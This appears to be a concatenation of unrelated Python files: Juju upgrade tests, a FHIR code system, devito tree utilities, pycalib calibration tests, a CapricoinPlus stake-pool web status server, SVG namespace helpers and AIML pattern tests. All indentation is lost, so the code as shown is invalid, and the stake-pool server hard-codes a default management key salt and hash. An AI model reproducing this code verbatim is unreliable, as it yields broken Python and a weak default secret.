assert app.data['charm-url'] != 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_revision(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ubuntu-0')
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(revision=8)
assert app.data['charm-url'] == 'cs:ubuntu-8'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_switch(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ubuntu-0')
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(switch='ubuntu-8')
assert app.data['charm-url'] == 'cs:ubuntu-8'
|
py | 1a4fcb64cd737f409ed175b2fc3a210d726956b4 | from pathlib import Path
from fhir.resources.codesystem import CodeSystem
from oops_fhir.utils import CodeSystemConcept
__all__ = ["StructureDefinitionKind"]
_resource = CodeSystem.parse_file(Path(__file__).with_suffix(".json"))
class StructureDefinitionKind:
"""
StructureDefinitionKind
Defines the type of structure that a definition is describing.
Status: active - Version: 4.0.1
Copyright None
http://hl7.org/fhir/structure-definition-kind
"""
primitive_type = CodeSystemConcept(
{
"code": "primitive-type",
"definition": "A primitive type that has a value and an extension. These can be used throughout complex datatype, Resource and extension definitions. Only the base specification can define primitive types.",
"display": "Primitive Data Type",
}
)
"""
Primitive Data Type
A primitive type that has a value and an extension. These can be used throughout complex datatype, Resource and extension definitions. Only the base specification can define primitive types.
"""
complex_type = CodeSystemConcept(
{
"code": "complex-type",
"definition": "A complex structure that defines a set of data elements that is suitable for use in 'resources'. The base specification defines a number of complex types, and other specifications can define additional types. These factory do not have a maintained identity.",
"display": "Complex Data Type",
}
)
"""
Complex Data Type
A complex structure that defines a set of data elements that is suitable for use in 'resources'. The base specification defines a number of complex types, and other specifications can define additional types. These factory do not have a maintained identity.
"""
resource = CodeSystemConcept(
{
"code": "resource",
"definition": "A 'resource' - a directed acyclic graph of elements that aggregrates other types into an identifiable entity. The base FHIR resources are defined by the FHIR specification itself but other 'resources' can be defined in additional specifications (though these will not be recognised as 'resources' by the FHIR specification (i.e. they do not get end-points etc, or act as the targets of references in FHIR defined resources - though other specificatiosn can treat them this way).",
"display": "Resource",
}
)
"""
Resource
A 'resource' - a directed acyclic graph of elements that aggregates other types into an identifiable entity. The base FHIR resources are defined by the FHIR specification itself but other 'resources' can be defined in additional specifications (though these will not be recognised as 'resources' by the FHIR specification (i.e. they do not get end-points etc, or act as the targets of references in FHIR defined resources - though other specifications can treat them this way).
"""
logical = CodeSystemConcept(
{
"code": "logical",
"definition": "A pattern or a template that is not intended to be a real resource or complex type.",
"display": "Logical",
}
)
"""
Logical
A pattern or a template that is not intended to be a real resource or complex type.
"""
class Meta:
resource = _resource
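# Illustrative sketch only: the class above is a plain namespace of constants,
# so a caller can (hypothetically) pick a kind and reach the parsed CodeSystem.
# Attribute names on CodeSystemConcept are assumed from the dicts above, not
# verified here.
#
#     kind = StructureDefinitionKind.resource          # one concept constant
#     system = StructureDefinitionKind.Meta.resource   # the parsed CodeSystem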
|
py | 1a4fcbb7e294b22c807f08d8f721626d9fa3a8c8 | from devito.ir.iet import Iteration, List, IterationTree, FindSections, FindSymbols
from devito.symbolics import Macro
from devito.tools import flatten
from devito.types import Array, LocalObject
__all__ = ['filter_iterations', 'retrieve_iteration_tree',
'compose_nodes', 'derive_parameters']
def retrieve_iteration_tree(node, mode='normal'):
"""Return a list of all :class:`Iteration` sub-trees rooted in ``node``.
For example, given the Iteration tree:
.. code-block:: c
Iteration i
expr0
Iteration j
Iteration k
expr1
Iteration p
expr2
Return the list: ::
[(Iteration i, Iteration j, Iteration k), (Iteration i, Iteration p)]
:param node: The searched Iteration/Expression tree.
:param mode: Accepted values are 'normal' (default) and 'superset', in which
case iteration trees that are subset of larger iteration trees
are dropped.
"""
assert mode in ('normal', 'superset')
trees = [IterationTree(i) for i in FindSections().visit(node) if i]
if mode == 'normal':
return trees
else:
match = []
for i in trees:
if any(set(i).issubset(set(j)) for j in trees if i != j):
continue
match.append(i)
return IterationTree(match)
def filter_iterations(tree, key=lambda i: i, stop=lambda: False):
"""
Given an iterable of :class:`Iteration` objects, return a new list
containing all items such that ``key(o)`` is True.
This function accepts an optional argument ``stop``. This may be either a
lambda function, specifying a stop criterion, or any of the following
special keywords: ::
* 'any': Return as soon as ``key(o)`` is False and at least one
item has been collected.
* 'asap': Return as soon as at least one item has been collected and
all items for which ``key(o)`` is False have been encountered.
It is useful to specify a ``stop`` criterion when one is searching the
first Iteration in an Iteration/Expression tree for which a given property
does not hold.
"""
assert callable(stop) or stop in ['any', 'asap']
tree = list(tree)
filtered = []
off = []
if stop == 'any':
stop = lambda: len(filtered) > 0
elif stop == 'asap':
hits = [i for i in tree if not key(i)]
stop = lambda: len(filtered) > 0 and len(off) == len(hits)
for i in tree:
if key(i):
filtered.append(i)
else:
off.append(i)
if stop():
break
return filtered
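# A minimal sketch of the ``stop`` behaviour described above. ``iet`` and the
# ``is_parallel`` predicate are hypothetical placeholders, not devito API:
#
#     tree = retrieve_iteration_tree(iet)[0]
#     inner = filter_iterations(tree, key=is_parallel, stop='asap')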
def compose_nodes(nodes, retrieve=False):
"""
Build an Iteration/Expression tree by nesting the nodes in ``nodes``.
"""
l = list(nodes)
tree = []
if not isinstance(l[0], Iteration):
# Nothing to compose
body = flatten(l)
body = List(body=body) if len(body) > 1 else body[0]
else:
body = l.pop(-1)
while l:
handle = l.pop(-1)
body = handle._rebuild(body, **handle.args_frozen)
tree.append(body)
if retrieve is True:
tree = list(reversed(tree))
return body, tree
else:
return body
def derive_parameters(nodes, drop_locals=False):
"""
Derive all input parameters (function call arguments) from an IET
by collecting all symbols not defined in the tree itself.
"""
# Pick all free symbols and symbolic functions from the kernel
functions = FindSymbols('symbolics').visit(nodes)
free_symbols = FindSymbols('free-symbols').visit(nodes)
# Filter out function base symbols and use real function objects
function_names = [s.name for s in functions]
symbols = [s for s in free_symbols if s.name not in function_names]
symbols = functions + symbols
defines = [s.name for s in FindSymbols('defines').visit(nodes)]
parameters = tuple(s for s in symbols if s.name not in defines)
# Drop globally-visible objects
parameters = [p for p in parameters if not isinstance(p, Macro)]
# Filter out locally-allocated Arrays and Objects
if drop_locals:
parameters = [p for p in parameters
if not (isinstance(p, Array) and (p._mem_heap or p._mem_stack))]
parameters = [p for p in parameters if not isinstance(p, LocalObject)]
return parameters
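# Hypothetical end-to-end sketch tying these helpers together: nest a sequence
# of Iterations around an expression body, then derive the kernel parameters.
# ``iterations`` and ``expressions`` are placeholders, not devito API.
#
#     body, tree = compose_nodes(list(iterations) + [expressions], retrieve=True)
#     parameters = derive_parameters(body, drop_locals=True)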
|
py | 1a4fcbc1ca49a31fca3b892c0ae5d1d9f4db2017 | def more_even_or_odd(integers):
ans = ""
even = 0
odd = 0
for i in integers:
if i % 2 == 0:
even += 1
else:
odd += 1
if even > odd:
ans += "Even"
elif even < odd:
ans += "Odd"
else:
ans += "Equal"
return ans |
py | 1a4fcd0268b6fa446c7a82deebff76cdefdcbd1e | # Standard imports
import pytest
import numpy as np
# Package imports
import pycalib.calibration_methods as calm
# General
@pytest.fixture(scope='module')
def sample_size():
return 1000
@pytest.fixture(scope='module')
def p_dist_beta(sample_size, a=1, b=4):
# Predicted probabilities (transformed to [0.5, 1])
return np.hstack([np.random.beta(a=a, b=b, size=sample_size)]) * 0.5 + 0.5
@pytest.fixture(scope='module')
def y_cal_binary(sample_size, prob_class_0=.66):
# Sample ground truth
return np.random.choice(a=[0, 1], size=sample_size, replace=True, p=[prob_class_0, 1 - prob_class_0])
@pytest.fixture(scope='module')
def p_cal_binary(sample_size, y_cal_binary, p_dist_beta, a=3, b=.1, c=1):
# Uncalibrated probabilities through miscalibration function f
# f = lambda x: 1 / (1 + c * (1 - x) ** a / x ** b)
f = lambda x: 1 / (1 + np.exp(-a * x - b))
sampler_f = lambda w, y: np.random.choice(a=[1 - y, y], p=[1 - f(w), f(w)])
y_pred = np.array(list(map(sampler_f, p_dist_beta, y_cal_binary)))
# Compute probabilities for other classes
p_pred = np.zeros([sample_size, 2])
for i in range(0, 2):
# Set probabilities for correct predictions
correct_and_index_i = (y_pred == y_cal_binary) & (y_cal_binary == i)
prob = p_dist_beta[correct_and_index_i]
p_pred[correct_and_index_i, i] = prob
p_pred[correct_and_index_i, 1 - i] = 1 - prob
# Set probabilities for incorrect predictions
false_and_index_i = (y_pred != y_cal_binary) & (y_cal_binary == i)
prob = p_dist_beta[false_and_index_i]
p_pred[false_and_index_i, i] = 1 - prob
p_pred[false_and_index_i, 1 - i] = prob
return p_pred
# Temperature Scaling
def test_constant_accuracy(p_cal_binary, y_cal_binary):
# Compute accuracy
acc = np.mean(np.equal(np.argmax(p_cal_binary, axis=1), y_cal_binary))
# Temperature Scaling
ts = calm.TemperatureScaling()
ts.fit(p_cal_binary, y_cal_binary)
# Test constant accuracy on calibration set
p_ts = ts.predict_proba(p_cal_binary)
acc_ts = np.mean(np.equal(np.argmax(p_ts, axis=1), y_cal_binary))
assert acc == acc_ts, "Accuracy of calibrated probabilities does not match accuracy of calibration set."
def test_temperature_positive(p_cal_binary, y_cal_binary):
# Temperature Scaling
ts = calm.TemperatureScaling()
ts.fit(p_cal_binary, y_cal_binary)
# Positive temperature
assert ts.T > 0, "Temperature is not positive."
# Histogram Binning
@pytest.mark.parametrize("binning_mode", [
("equal_width"),
("equal_freq")
])
def test_hist_binning_bin_size(p_cal_binary, y_cal_binary, binning_mode):
n_bins = 2
hb = calm.HistogramBinning(mode=binning_mode, n_bins=n_bins)
hb.fit(p_cal_binary, y_cal_binary)
assert len(hb.binning) == n_bins + 1, "Number of bins does not match input."
# Bayesian Binning into Quantiles
def test_bin_with_size_zero():
# Data
p_cal = .5 * np.ones([100, 2])
y_cal = np.hstack([np.ones([50]), np.zeros([50])])
# Fit calibration model
bbq = calm.BayesianBinningQuantiles()
bbq.fit(X=p_cal, y=y_cal)
# Predict
p_pred = bbq.predict_proba(X=p_cal)
# Check for NaNs
assert not np.any(np.isnan(p_pred)), "Calibrated probabilities are NaN."
# GP calibration
def test_inference_mean_approximation(p_cal_binary, y_cal_binary):
# GP calibration
gpc = calm.GPCalibration(n_classes=2, logits=False, random_state=42)
gpc.fit(p_cal_binary, y_cal_binary)
# Inference: mean approximation
p_gpc = gpc.predict_proba(p_cal_binary, mean_approx=True)
# Check for NaNs in predictions
assert not np.any(np.isnan(p_gpc)), "Calibrated probabilities of the mean approximation are NaN."
# OneVsAll calibration
def test_output_size_missing_classes():
# Generate random training data with n_classes > n_calibration
np.random.seed(1)
n_classes = 200
n_calibration = 100
X_cal = np.random.uniform(0, 1, [n_calibration, n_classes])
X_cal /= np.sum(X_cal, axis=1)[:, np.newaxis]
y_cal = np.random.choice(range(n_classes), n_calibration)
# Arbitrary Choice of binary calibration method
platt = calm.PlattScaling()
platt.fit(X_cal, y_cal)
# Test output size
assert np.shape(platt.predict_proba(X_cal))[
1] == n_classes, "Predicted probabilities do not match number of classes."
|
py | 1a4fcdaa3e46e1c673492603aa1246f37cf81f28 | # -*- coding: utf-8 -*-
# Copyright (c) 2018-2019 The Particl Core developers
# Copyright (c) 2020 The Capricoin+ Core developers
# Distributed under the MIT software license, see the accompanying
# file LICENSE.txt or http://www.opensource.org/licenses/mit-license.php.
import os
import json
import hashlib
import threading
import decimal
import http.client
from http.server import BaseHTTPRequestHandler, HTTPServer
from .util import (
COIN,
makeInt,
format8,
format16,
)
class HttpHandler(BaseHTTPRequestHandler):
def page_error(self, error_str):
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Error</title></head>' \
+ '<body>' \
+ '<p>Error: ' + error_str + '</p>' \
+ '<p><a href=\'/\'>home</a></p>' \
+ '</body></html>'
return bytes(content, 'UTF-8')
def js_error(self, error_str):
error_str_json = json.dumps({'error': error_str})
return bytes(error_str_json, 'UTF-8')
def js_address(self, urlSplit):
if len(urlSplit) < 4:
raise ValueError('Must specify address')
address_str = urlSplit[3]
stakePool = self.server.stakePool
return bytes(json.dumps(stakePool.getAddressSummary(address_str)), 'UTF-8')
def js_metrics(self, urlSplit):
stakePool = self.server.stakePool
if len(urlSplit) > 3:
code_str = urlSplit[3]
hashed = hashlib.sha256(str(code_str + self.server.management_key_salt).encode('utf-8')).hexdigest()
if not hashed == self.server.management_key_hash:
raise ValueError('Unknown argument')
return bytes(json.dumps(stakePool.rebuildMetrics()), 'UTF-8')
return bytes(json.dumps(stakePool.getMetrics()), 'UTF-8')
def js_index(self, urlSplit):
return bytes(json.dumps(self.server.stakePool.getSummary()), 'UTF-8')
def page_config(self, urlSplit):
settings_path = os.path.join(self.server.stakePool.dataDir, 'stakepool.json')
if not os.path.exists(settings_path):
return self.page_error('Settings file not found.')
with open(settings_path) as fs:
settings = json.load(fs)
settings['capricoinplusbindir'] = '...'
settings['capricoinplusdatadir'] = '...'
settings['poolownerwithdrawal'] = '...'
settings.pop('management_key_salt', None)
settings.pop('management_key_hash', None)
return bytes(json.dumps(settings, indent=4), 'UTF-8')
def page_address(self, urlSplit):
if len(urlSplit) < 3:
return self.page_error('Must specify address')
address_str = urlSplit[2]
stakePool = self.server.stakePool
try:
summary = stakePool.getAddressSummary(address_str)
except Exception as e:
return self.page_error(str(e))
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Address </title></head>' \
+ '<body>' \
+ '<h2>Spend Address ' + address_str + '</h2>' \
+ '<h4>Pool Address ' + stakePool.poolAddr + '</h4>'
if 'accumulated' in summary:
content += '<table>' \
+ '<tr><td>Accumulated:</td><td>' + format16(summary['accumulated']) + '</td></tr>' \
+ '<tr><td>Payout Pending:</td><td>' + format8(summary['rewardpending']) + '</td></tr>' \
+ '<tr><td>Paid Out:</td><td>' + format8(summary['rewardpaidout']) + '</td></tr>' \
+ '<tr><td>Last Total Staking:</td><td>' + format8(summary['laststaking']) + '</td></tr>' \
+ '<tr><td>Current Total in Pool:</td><td>' + format8(summary['currenttotal']) + '</td></tr>' \
+ '</table>'
else:
content += '<table>' \
+ '<tr><td>Current Total in Pool:</td><td>' + format8(summary['currenttotal']) + '</td></tr>' \
+ '</table>'
content += '<p><a href=\'/\'>home</a></p></body></html>'
return bytes(content, 'UTF-8')
def page_version(self):
try:
versions = self.server.stakePool.getVersions()
except Exception as e:
return self.page_error(str(e))
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Demo</title></head>' \
+ '<body>' \
+ '<h2>CapricoinPlus Stake Pool Demo</h2>' \
+ '<p>' \
+ 'Pool Version: ' + versions['pool'] + '<br/>' \
+ 'Core Version: ' + versions['core'] + '<br/>' \
+ '</p>' \
+ '<p><a href=\'/\'>home</a></p></body></html>'
return bytes(content, 'UTF-8')
def page_index(self):
stakePool = self.server.stakePool
try:
summary = stakePool.getSummary()
except Exception as e:
return self.page_error(str(e))
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Demo</title></head>' \
+ '<body>' \
+ '<h2>CapricoinPlus Stake Pool Demo</h2>' \
+ '<p>' \
+ 'Mode: ' + summary['poolmode'] + '<br/>' \
+ 'Pool Address: ' + stakePool.poolAddr + '<br/>' \
+ 'Pool Fee: ' + str(stakePool.poolFeePercent) + '%<br/>' \
+ 'Stake Bonus: ' + str(stakePool.stakeBonusPercent) + '%<br/>' \
+ 'Payout Threshold: ' + format8(stakePool.payoutThreshold) + '<br/>' \
+ 'Blocks Between Payment Runs: ' + str(stakePool.minBlocksBetweenPayments) + '<br/>' \
+ 'Minimum output value: ' + format8(stakePool.minOutputValue) + '<br/>'
if stakePool.smsg_fee_rate_target is not None:
content += 'SMSG fee rate target: ' + format8(makeInt(stakePool.smsg_fee_rate_target)) + '<br/>'
content += '</p><p>' \
+ 'Synced Height: ' + str(summary['poolheight']) + '<br/>' \
+ 'Blocks Found: ' + str(summary['blocksfound']) + '<br/>' \
+ 'Total Disbursed: ' + format8(summary['totaldisbursed']) + '<br/>' \
+ 'Last Payment Run: ' + str(summary['lastpaymentrunheight']) + '<br/>' \
+ '<br/>' \
+ 'Total Pool Rewards: ' + format8(summary['poolrewardtotal']) + '<br/>' \
+ 'Total Pool Fees: ' + format8(summary['poolfeestotal']) + '<br/>' \
+ 'Total Pool Rewards Withdrawn: ' + format8(summary['poolwithdrawntotal']) + '<br/>' \
+ '<br/>' \
+ 'Total Pooled Coin: ' + format8(int(decimal.Decimal(summary['watchonlytotalbalance']) * COIN)) + '<br/>' \
+ 'Currently Staking: ' + format8(summary['stakeweight']) + '<br/>' \
+ '</p>'
content += '<br/><h3>Recent Blocks</h3><table><tr><th>Height</th><th>Block Hash</th><th>Block Reward</th><th>Total Coin Staking</th></tr>'
for b in summary['lastblocks']:
content += '<tr><td>' + str(b[0]) + '</td><td>' + b[1] + '</td><td>' + format8(b[2]) + '</td><td>' + format8(b[3]) + '</td></tr>'
content += '</table>'
content += '<br/><h3>Pending Payments</h3><table><tr><th>Txid</th><th>Disbursed</th></tr>'
for b in summary['pendingpayments']:
content += '<tr><td>' + b[0] + '</td><td>' + format8(b[1]) + '</td></tr>'
content += '</table>'
content += '<br/><h3>Last Payments</h3><table><tr><th>Height</th><th>Txid</th><th>Disbursed</th></tr>'
for b in summary['lastpayments']:
content += '<tr><td>' + str(b[0]) + '</td><td>' + b[1] + '</td><td>' + format8(b[2]) + '</td></tr>'
content += '</table>'
content += '</body></html>'
return bytes(content, 'UTF-8')
"""
def page_help(self):
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Demo</title></head>' \
+ '<body>' \
+ '<h2>CapricoinPlus Stake Pool Demo</h2>' \
+ '<h3>Help</h3>' \
+ '<p>' \
+ '</p></body></html>'
return bytes(content, 'UTF-8')
"""
def putHeaders(self, status_code, content_type):
self.send_response(status_code)
if self.server.allow_cors:
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', content_type)
self.end_headers()
def handle_http(self, status_code, path):
urlSplit = self.path.split('/')
if len(urlSplit) > 1:
if urlSplit[1] == 'address':
self.putHeaders(status_code, 'text/html')
return self.page_address(urlSplit)
if urlSplit[1] == 'version':
self.putHeaders(status_code, 'text/html')
return self.page_version()
if urlSplit[1] == 'config':
self.putHeaders(status_code, 'text/plain')
return self.page_config(urlSplit)
if urlSplit[1] == 'json':
self.putHeaders(status_code, 'text/plain')
try:
if len(urlSplit) > 2:
if urlSplit[2] == 'version':
return bytes(json.dumps(self.server.stakePool.getVersions()), 'UTF-8')
if urlSplit[2] == 'address':
return self.js_address(urlSplit)
if urlSplit[2] == 'metrics':
return self.js_metrics(urlSplit)
return self.js_index(urlSplit)
except Exception as e:
return self.js_error(str(e))
self.putHeaders(status_code, 'text/html')
return self.page_index()
def do_GET(self):
response = self.handle_http(200, self.path)
self.wfile.write(response)
def do_HEAD(self):
self.putHeaders(200, 'text/html')
def do_OPTIONS(self):
self.send_response(200, 'ok')
if self.server.allow_cors:
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Headers', '*')
self.end_headers()
class HttpThread(threading.Thread, HTTPServer):
def __init__(self, fp, hostName, portNo, allow_cors, stakePool, key_salt=None, key_hash=None):
threading.Thread.__init__(self)
self.stop_event = threading.Event()
self.fp = fp
self.hostName = hostName
self.portNo = portNo
self.allow_cors = allow_cors
self.stakePool = stakePool
self.management_key_salt = 'ajf8923ol2xcv.' if key_salt is None else key_salt
self.management_key_hash = 'fd5816650227b75143e60c61b19e113f43f5dcb57e2aa5b6161a50973f2033df' if key_hash is None else key_hash
self.timeout = 60
HTTPServer.__init__(self, (self.hostName, self.portNo), HttpHandler)
def stop(self):
self.stop_event.set()
# Send fake request
conn = http.client.HTTPConnection(self.hostName, self.portNo)
conn.connect()
conn.request("GET", "/none")
response = conn.getresponse()
data = response.read()
conn.close()
def stopped(self):
return self.stop_event.is_set()
def serve_forever(self):
while not self.stopped():
self.handle_request()
self.socket.close()
def run(self):
self.serve_forever()
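# Illustrative sketch of how a pool daemon might drive this server. The values
# are hypothetical and ``pool`` stands for an initialised stake pool object:
#
#     srv = HttpThread(fp, '127.0.0.1', 9000, True, pool)
#     srv.start()   # serves /, /address/<addr>, /config, /version and /json/...
#     ...
#     srv.stop()    # unblocks handle_request() with a dummy GET and exits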
|
py | 1a4fce8ca73064afba7deda533ecd1b95e4ae86b | from xml.etree.ElementTree import register_namespace
namespaces = {
'': 'http://www.w3.org/2000/svg',
'inkscape': 'http://www.inkscape.org/namespaces/inkscape',
'sodipodi': 'http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd',
'svg': 'http://www.w3.org/2000/svg',
'freecad': 'http://www.freecadweb.org/wiki/index.php?title=Svg_Namespace',
'xml': 'http://www.w3.org/XML/1998/namespace'
}
def namespaced(name, namespace_prefix=''):
return f'{{{namespaces[namespace_prefix]}}}{name}'
def namespaced_attrib(name, namespace_prefix=''):
if namespace_prefix == '':
return name
return namespaced(name, namespace_prefix)
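# Quick illustration of the helpers above; the expected values follow directly
# from the ``namespaces`` table:
#
#     >>> namespaced('svg')
#     '{http://www.w3.org/2000/svg}svg'
#     >>> namespaced_attrib('label', 'inkscape')
#     '{http://www.inkscape.org/namespaces/inkscape}label'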
def register_namespaces():
for prefix, url in namespaces.items():
register_namespace(prefix, url) |
py | 1a4fcf2471eaac8095b62ec5661f078752a0fd33 | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
import os
from programytest.client import TestClient
class PatternSetTestClient(TestClient):
def __init__(self):
TestClient.__init__(self)
def load_storage(self):
super(PatternSetTestClient, self).load_storage()
self.add_default_stores()
self.add_categories_store([os.path.dirname(__file__)])
self.add_sets_store([os.path.dirname(__file__) + os.sep + "sets"])
class PatternSetAIMLTests(unittest.TestCase):
def setUp(self):
client = PatternSetTestClient()
self._client_context = client.create_client_context("testid")
self._client_context.brain.dynamics.add_dynamic_set('number', "programy.dynamic.sets.numeric.IsNumeric", None)
def test_patten_set_match(self):
response = self._client_context.bot.ask_question(self._client_context, "MY FAVORITE COLOR IS AMBER")
self.assertEqual(response, "Amber IS A NICE COLOR.")
def test_patten_match_multi_word_set(self):
response = self._client_context.bot.ask_question(self._client_context, "MY FAVORITE COLOR IS AIR FORCE BLUE")
self.assertEqual(response, "Air Force blue IS A NICE COLOR.")
def test_patten_match_multi_word_set_latina(self):
response = self._client_context.bot.ask_question(self._client_context, "MY FAVORITE COLOR IS CAFÉ AU LAIT")
self.assertEqual(response, "Café au lait IS A NICE COLOR.")
def test_patten_match_mixed_word_set(self):
response = self._client_context.bot.ask_question(self._client_context, "MY FAVORITE COLOR IS RED")
self.assertEqual(response, "Red IS A NICE COLOR.")
response = self._client_context.bot.ask_question(self._client_context, "MY FAVORITE COLOR IS RED ORANGE")
self.assertEqual(response, "Red Orange IS A NICE COLOR.")
response = self._client_context.bot.ask_question(self._client_context, "MY FAVORITE COLOR IS SACRAMENTO STATE GREEN")
self.assertEqual(response, "Sacramento State green IS A NICE COLOR.")
def test_patten_match_mixed_word_set_longer_sentence(self):
response = self._client_context.bot.ask_question(self._client_context, "I DO NOT LIKE RED VERY MUCH")
self.assertEqual(response, "IT IS OK, Red IS NOT MY BEST COLOUR EITHER.")
response = self._client_context.bot.ask_question(self._client_context, "I DO NOT LIKE RED ORANGE AT ALL")
self.assertEqual(response, "IT IS OK, Red Orange IS NOT MY BEST COLOUR EITHER.")
response = self._client_context.bot.ask_question(self._client_context, "I DO NOT LIKE SACRAMENTO STATE GREEN AT ALL")
self.assertEqual(response, "IT IS OK, Sacramento State green IS NOT MY BEST COLOUR EITHER.")
def test_patten_match_mixed_word_set_at_front(self):
response = self._client_context.bot.ask_question(self._client_context, "RED IS A NICE COLOUR")
self.assertEqual(response, "YES Red IS A LOVELY COLOUR.")
response = self._client_context.bot.ask_question(self._client_context, "RED ORANGE IS A NICE COLOUR")
self.assertEqual(response, "YES Red Orange IS A LOVELY COLOUR.")
response = self._client_context.bot.ask_question(self._client_context, "SACRAMENTO STATE GREEN IS A NICE COLOUR")
self.assertEqual(response, "YES Sacramento State green IS A LOVELY COLOUR.")
def test_inbuilt_set_number(self):
response = self._client_context.bot.ask_question(self._client_context, "Is 666 a number")
self.assertEqual(response, "Yes 666 is a number.")
|